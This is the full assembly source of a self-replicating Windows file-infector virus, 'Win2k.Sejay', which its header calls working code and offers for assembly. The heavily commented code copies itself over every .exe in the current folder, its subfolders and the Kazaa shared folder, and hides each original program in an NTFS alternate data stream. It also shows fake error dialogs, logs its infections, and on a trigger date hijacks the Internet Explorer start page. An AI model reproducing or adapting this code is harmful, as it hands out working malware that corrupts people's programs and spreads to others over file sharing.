; ____________________________ ; | | ; | Win2k.Sejay |# ; | Stream Companion Virus |## ; | |## ; | coded by DiA/rrlf |## ; | (c)2005 Germany |## ; | |## ; | DiA_hates_machine@gmx.de |## ; | http://www.vx-dia.de.vu |## ; |____________________________|## ; ############################## ; ############################# ; ; ; ; .disclaimer ; This is a source code of a working virus! If you rewrite, copy or assemble it ; you and only YOU are responsible for the things you do! Take care... ; ; ; .intro ; This is a companion virus, using the "Stream Companion" method. Only working ; on NTFS formated harddrives, because FAT don't have the streaming feature. ; Inspired from the first "Stream Companion" virus Win2k.Stream (also the only ; one source I can find to learn from). Dedicated to my mate Erik, who is the ; name-father of this virus. I have heavy commented the source, hopy you like ; it! Only tested under WinXP SP1... ; ; ; .description ; -check OS, if its not Win2000 or above show a fake error message, because virus ; can't execute host or infecting files ; ; -working with a temp file, stored in windows directory as Sejay.DiA ; ; -infect files by creating a new stream with name of last 4 bytes from victim file ; eG Whatever.exe copy to Whatever.exe:ever ; then copy virus over the main stream Whatever.exe ; ; -the virus checks if the stream already exists, if so the file is already infected ; ; -execute host by creating stream name and run it eG execute Whatever.exe:ever , ; if something goes wrong it shows a fake message (also on first generation) ; ; -infect current folder, all sub-folders and the Kazaa Shared Folder (aka P2P spreading) ; ; -log every infected file in a file stored in windows directory called Sejay.htm , ; and if payload date (03.02) the virus sets this file to start page from IE, when ; somethin goes wrong it shows a simple message box with a lyric from Bad Luck 13 ; ; -unpacked the virus is 5632bytes huge, after upx'ing its 3072bytes small. ; ; ; .assemble ; Assemble it with the Flatassembler GUI version 1.56, you can get this nice assembler ; for free at http://flatassembler.net ! ; ; ; .outro ; For bug report or greets/fucks please mail me at DiA_hates_machine@gmx.de or do a entry ; in my guestbook at http://www.vx-dia.de.vu . And now have fun with this little creature... ; ; ; .source ;-----Sejay.asm-----start-------------------------------------------------------------------------------------------------- include "%fasminc%\win32ax.inc" ;equates Sejay: ;virus start invoke GetVersion ;get os verion (al=05 -> win2000 and above [eg winxp is 0A280105h]) cmp al, 05d ;check al for 05 jne NonNTFS ;if not show some fake error msg invoke GetModuleFileName,\ ;get virus file name 0,\ ;no handle VirusFile,\ ;save here full path 256d ;size of buffer cmp eax, 0 ;error? no virus path, no infection je ExecuteHost ;run host without infection :@ invoke GetWindowsDirectory,\ ;to store the temp file in WinTempDir,\ ;save here 256d ;size of buffer cmp eax, 0 ;error je ExecuteHost ;narf... mov esi, WinTempDir ;to check if the path is valid GetPathEnd: cmp byte [esi], 0 ;end of string? je CheckIfValid ;check for "\" at the end inc esi ;address + 1 jmp GetPathEnd CheckIfValid: cmp byte [esi - 1], "\" ;check for "\" at the end je BindStrings ;then dont append the \ mov byte [esi], "\" ;place a \ at the end of the string mov dword [esi + 1], 0 ; ,0 BindStrings: invoke lstrcat,\ ;append TempFile string via api WinTempDir,\ ;append to windows path TempFile ;append sthis invoke GetWindowsDirectory,\ ;to get payload file PayTempFile,\ ;store it here 256d ;size of buffer mov esi, PayTempFile ;check if it is valid GetPayEnd: cmp byte [esi], 0 ;end? je CheckValidness ;same as above inc esi jmp GetPayEnd ;again CheckValidness: cmp byte [esi - 1], "\" ;check string end for \ je MakePayFile ;all is ok mov byte [esi], "\" ;place \ at end mov dword [esi + 1], 0 ;zero MakePayFile: invoke lstrcat,\ ;bind strings PayTempFile,\ ;append to win dir PayFile ;the filename invoke CreateFile,\ ;open temp file PayTempFile,\ ;this GENERIC_READ + GENERIC_WRITE,\ ;read n write access FILE_SHARE_WRITE,\ ;open if can write 0,\ ;no security attributes OPEN_EXISTING,\ ;open the file FILE_ATTRIBUTE_NORMAL,\ ;normal 0 ;no handle cmp eax, INVALID_HANDLE_VALUE ;error? jne SaveHandle ;if not dont create file again call CreatePayloadFile ;if not exist create payload file SaveHandle: mov dword [PayHandle], eax ;save handle call InfectFolder ;infect current folder (all files) invoke FindFirstFile,\ ;get some folders Folder,\ ;by search for *.* Win32FindData ;already defined mov dword [FolderHandle], eax ;save handle FindMoreFolder: cmp eax, 0 ;no more folders?! je CloseFolderHandle ;then close handle and execute host stream invoke GetCurrentDirectory,\ ;to get a valid SetCurrentDir.. path 256d,\ ;size of buffer VictimFolder ;save there mov esi, VictimFolder ;get end of string GetEndDir: cmp byte [esi], 0 ;check for zero -> end je HaveEndDir ;check for validness inc esi ;next byte jmp GetEndDir ;check HaveEndDir: cmp byte [esi - 1], "\" ;is there a \ je DirValid ;if so, it is valid mov byte [esi], "\" ;if not make it valid mov dword [esi + 1], 0 ;end of string DirValid: mov esi, Win32FindData.cFileName ;get end of victim string GetEndVictim: cmp byte [esi], 0 ;end of string? je HaveEndVictim ;if so jmp to ... inc esi ;next byte jmp GetEndVictim ;check it baby HaveEndVictim: cmp byte [esi - 1], "." ;found a . or .. ?! je FindNextFolder ;if so find next cmp byte [esi - 4], "." ;is it a file? je FindNextFolder ;if so find next mov byte [esi], "\" ;to get a valid path mov dword [esi + 1], 0 ;zero at the end invoke lstrcat,\ ;bind strings VictimFolder,\ ;string1 Win32FindData.cFileName ;add this invoke SetCurrentDirectory,\ ;change directory VictimFolder ;to this cmp eax, 0 ;error? je FindNextFolder ;then find next call InfectFolder ;infect it baby mov esi, VictimFolder ;to change directory back GetFirstFolder1: cmp byte [esi], 0 ;check for end je HaveFirstFolder1 ;have it inc esi ;continue jmp GetFirstFolder1 ;... HaveFirstFolder1: sub esi, 2 ;get before "\" GetFirstFolder2: cmp byte [esi], "\" ;check for \ je HaveFirstFolder2 ;change back dec esi ;-1 jmp GetFirstFolder2 ;check HaveFirstFolder2: mov dword [esi + 1], 0 ;clear all after invoke SetCurrentDirectory,\ ;set it new VictimFolder ;to first folder FindNextFolder: invoke FindNextFile,\ ;find next dword [FolderHandle],\ ;the handle Win32FindData ;the structure jmp FindMoreFolder ;go get it CloseFolderHandle: invoke CloseHandle,\ ;close handle dword [FolderHandle] ;this invoke RegOpenKeyEx,\ ;open key HKEY_CURRENT_USER,\ ;with this handle KazaaShare,\ ;this subkey 0,\ ;reserved KEY_QUERY_VALUE,\ ;read a value KazaaRegHandle ;save there the handle cmp eax, 0 ;error? jne ExecuteHost ;no kazaa installed invoke RegQueryValueEx,\ ;read the value (shared folder path) dword [KazaaRegHandle],\ ;handle KazzaFolder,\ ;DlDir0 0,\ ;reserved 0,\ ;its a string KazaaVictim,\ ;save there the path KazaaSize ;size of buffer cmp eax, 0 ;error? jne CloseRegKey ;the close the key, no infection mov esi, KazaaVictim ;to check validness GetKazaaEnd: cmp byte [esi], 0 ;end of string? je HaveKazaaEnd ;jmp to there inc esi ;next place jmp GetKazaaEnd ;go for it! HaveKazaaEnd: cmp byte [esi - 1], "\" ;check for \ je KazaaSlash ;if exist jmp to ... mov byte [esi], "\" ;make it valid mov dword [esi + 1], 0 ;zero at end KazaaSlash: invoke SetCurrentDirectory,\ ;change to kazaa folder KazaaVictim ;infect this please call InfectFolder ;DO IT! CloseRegKey: invoke RegCloseKey,\ ;close key dword [KazaaRegHandle] ;with handle ExecuteHost: mov esi, VirusFile ;make host file string GetHostFileStream: cmp byte [esi], 0 ;0 is the end of the string je AppendHostStream ;then append stream name inc esi ;address + 1 jmp GetHostFileStream ;check next byte AppendHostStream: mov edi, dword [esi - 8d] ;load a dword in edi (last 4 chars of host file name) mov byte [esi], ":" ;append a : and then the name mov dword [esi + 1d], edi ;append last dword of victims name mov dword [esi + 5d], 0 ;append the zero invoke GetCommandLine ;get commandline (maybe user did some parameters) invoke CreateProcess,\ ;run host file stream VirusFile,\ ;current file + streamname = host stream eax,\ ;commandline in eax 0,\ ;no attributes 0,\ ;... 0,\ ;no flag CREATE_NEW_CONSOLE,\ ;run new prog 0,\ ;no new enviroment block 0,\ ;no current directory StartupInfo,\ ;structure ProcessInfo ;structure cmp eax, 0 ;error starting stream? je CantRunHost ;show error msg box invoke GetSystemTime,\ ;payload action?! Systemtime ;structure cmp word [Systemtime.wMonth], 02d ;2. month of the year? jne Exit ;if not the exit cmp word [Systemtime.wDay], 03d ;03.02? jne Exit ;goodbye invoke RegOpenKeyEx,\ ;open registry key HKEY_CURRENT_USER,\ ;handle PaySubkey,\ ;open this 0,\ ;reserved KEY_SET_VALUE,\ ;set a value PayRegHandle ;save here the handle cmp eax, 0 ;error? jne PayloadMessage ;then other payload invoke lstrlen,\ ;get lenth of pay file string PayTempFile ;here inc eax ;including the zero invoke RegSetValueEx,\ ;change start page of IE dword [PayRegHandle],\ ;handle of open key PayIEStart,\ ;value name 0,\ ;reserved REG_SZ,\ ;its a string PayTempFile,\ ;this data eax ;size cmp eax, 0 ;error? jne PayloadMessage ;hmm, then use a simple msgbox invoke RegCloseKey,\ ;close it dword [PayRegHandle] ;with handle jmp Exit ;bye PayloadMessage: invoke MessageBox,\ ;show user a msgbox 0,\ ;bad luck 13 lyric PayLyric,\ ;more lines then one "You are infected with Win2k.Sejay! :: coded by DiA/rrlf (c)05",\ MB_ICONINFORMATION ;information style Exit: invoke CloseHandle,\ ;close payload file dword [PayHandle] ;with handle invoke ExitProcess,\ ;exit virus 0 NonNTFS: invoke MessageBox,\ ;no ntfs formated, cant run virus 0,\ "This application requires a NTFS formated disk.",\ ;) "ERROR 53656A6179",\ ;hex for Sejay MB_ICONERROR ;scary error jmp Exit ;dont grumble the win9x user anymore ^^ CantRunHost: invoke MessageBox,\ ;cant run host :/ 0,\ "Application execution failed.",\ "ERROR 446941",\ ;hex for DiA MB_ICONERROR jmp Exit CreatePayloadFile: invoke CreateFile,\ ;create the payload file in win dir PayTempFile,\ ;create this GENERIC_READ + GENERIC_WRITE,\ ;read n write FILE_SHARE_WRITE,\ ;to write 0,\ ;no attributes CREATE_NEW,\ ;new file FILE_ATTRIBUTE_NORMAL,\ ;normal all 0 ;no handle push eax ;save handle invoke WriteFile,\ ;write file header eax,\ ;handle PayHTMLhead,\ ;points to buffer 133d,\ ;numers of bytes to write PayBytesWritten,\ ;bytes written 0 ;no overlapped pop eax ;get handle ret ;return InfectFolder: invoke FindFirstFile,\ ;find first vicitim (*.exe) Victims,\ ;exe Win32FindData ;structure mov dword [FindHandle], eax ;save handle FindMoreFiles: cmp eax, 0 ;no more files?! je InfectDone ;restore host file name (steam) and run it invoke lstrcpy,\ ;copy victim path to appen stream name VictimStream,\ ;copy to this Win32FindData.cFileName ;from this (eax points to buffer string ..VistimStream..) GetVictimFileStream: cmp byte [eax], 0 ;get end of string je CheckVirusFile ;check if founded file is the virus file itself & append the stream name inc eax ;address + 1 jmp GetVictimFileStream ;next byte CheckVirusFile: mov ebx, VirusFile ;to jmp to the end of the string GetVirusFileEnd: cmp byte [ebx], 0 ;zero = end je CompareFiles ;copare the strings (1dowrd (xxxx)) inc ebx ;if not address + 1 jmp GetVirusFileEnd CompareFiles: mov esi, dword [ebx - 8d] ;load a dword befor extension mov edi, dword [eax - 8d] ;... cmp esi, edi ;compare je FindNextVictim ;dont belong the virus mov byte [eax], ":" ;append a : and then the name mov dword [eax + 1d], edi ;append last dword of victims name mov dword [eax + 5d], 0 ;append the zero invoke CopyFile,\ ;copy victim to temp file Win32FindData.cFileName,\ ;this to WinTempDir,\ ;temp file 0 ;copy always cmp eax, 0 ;error? je FindNextVictim ;dont infect if we cant make a temp file invoke CopyFile,\ ;check if we can copy the temp file to stream name WinTempDir,\ ;if not the file is already infected VictimStream,\ ;to this name Victim.exe:ctim 1 ;not copy always cmp eax, 0 ;error? je FindNextVictim ;then find next file invoke CopyFile,\ ;copy virus file to vivtim VirusFile,\ ;this Win32FindData.cFileName,\ ;to this 0 ;always cmp eax, 0 ;error?! je FindNextVictim ;no infection, narf invoke CopyFile,\ ;copy victim to stream WinTempDir,\ ;temp file VictimStream,\ ;this 0 ;always cmp eax, 0 ;erroreee je FindNextVictim ;more more more invoke SetFilePointer,\ ;end of payload file dword [PayHandle],\ ;handle of file 0,\ ;no distance, only end 0,\ ;brrr FILE_END ;there we go invoke WriteFile,\ ;infected html header <html><body> dword [PayHandle],\ ;file handle PayInfHeader,\ ;filename + scary message 12d,\ ;number of bytes to write PayBytesWritten,\ ;number of bytes written 0 ;no structure invoke lstrcat,\ ;append scarey infected! message Win32FindData.cFileName,\ ;append to this PayInfected ;payload message invoke lstrlen,\ ;get legth of string to write it in payload file eax ;pointer to buffer ^^^^ invoke WriteFile,\ ;write infected file to payload file dword [PayHandle],\ ;file handle Win32FindData.cFileName,\ ;filename + scary message eax,\ ;number of bytes to write PayBytesWritten,\ ;number of bytes written 0 ;no structure FindNextVictim: invoke DeleteFile,\ ;delete WinTempDir ;the temp file invoke FindNextFile,\ ;find more files to infect dword [FindHandle],\ ;handle from FindFirstFile Win32FindData ;structure jmp FindMoreFiles ;go get it! InfectDone: invoke CloseHandle,\ ;close find handle dword [FindHandle] ret ;back to call Datas: VirusFile rb 256d ;save here full path of virus file WinTempDir rb 256d ;to store temp files Victims db "*.exe",0 ;search for exe FindHandle dd ? ;save here handle to find exe files VictimStream rb 256d ;victim stream name TempFile db "Sejay.DiA",0 ;temp file FolderHandle dd ? ;handle for finding sub folders VictimFolder rb 256d ;save here folder to infect Folder db "*.*",0 ;find all (including folders) KazaaShare db "Software\Kazaa\Transfer",0 ;for kazza share folder infection KazaaRegHandle dd ? ;handle for reg key KazzaFolder db "DlDir0",0 ;value name KazaaVictim rb 255d ;save path here KazaaSize db 255d ;size of buffer StartupInfo STARTUPINFO ;structure already defined by fasm ProcessInfo PROCESS_INFORMATION ;... Win32FindData FINDDATA ;... Systemtime SYSTEMTIME ;... PayTempFile rb 256d PayFile db "Sejay.htm",0 PayHTMLhead db "<html><head><title>Win2k.Sejay</title></head><body text='#FF0000' bgcolor='#000000'><h1>YOUR COMPUTER IS INFECTED!</h1></body></html>",0 PayInfHeader db "<html><body>",0 PayInfected db " - <b>infected with Win2k.Sejay by DiA/rrlf</b><br></body></html>",0 PaySubkey db "Software\Microsoft\Internet Explorer\Main",0 PayIEStart db "Start Page",0 PayLyric db "Kings of the underground, hardest of the hardcore.",10,13 db "Bottles flyin' all around, bats are on the dance floor",10,13,10,13 db "Flames of hell surround me, blood is dripping down my face",10,13 db "The realife psychopaths, Bad luck will destroy this place.",10,13,10,13 db "...Like pussies you run.",10,13,"3 minutes, that's all, our set is done.",0 PayHandle dd ? PayBytesWritten dd ? PayRegHandle dd ? data import ;import api's library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ advapi32, "ADVAPI32.DLL" import kernel32,\ GetVersion, "GetVersion",\ GetModuleFileName, "GetModuleFileNameA",\ CreateProcess, "CreateProcessA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ CopyFile, "CopyFileA",\ lstrcpy, "lstrcpyA",\ DeleteFile, "DeleteFileA",\ GetCommandLine, "GetCommandLineA",\ GetWindowsDirectory, "GetWindowsDirectoryA",\ lstrcat, "lstrcatA",\ lstrlen, "lstrlenA",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ SetFilePointer, "SetFilePointer",\ CloseHandle, "CloseHandle",\ GetSystemTime, "GetSystemTime",\ GetCurrentDirectory, "GetCurrentDirectoryA",\ SetCurrentDirectory, "SetCurrentDirectoryA",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegSetValueEx, "RegSetValueExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCloseKey, "RegCloseKey" end data ;-----Sejay.asm-----end----------------------------------------------------------------------------------------------------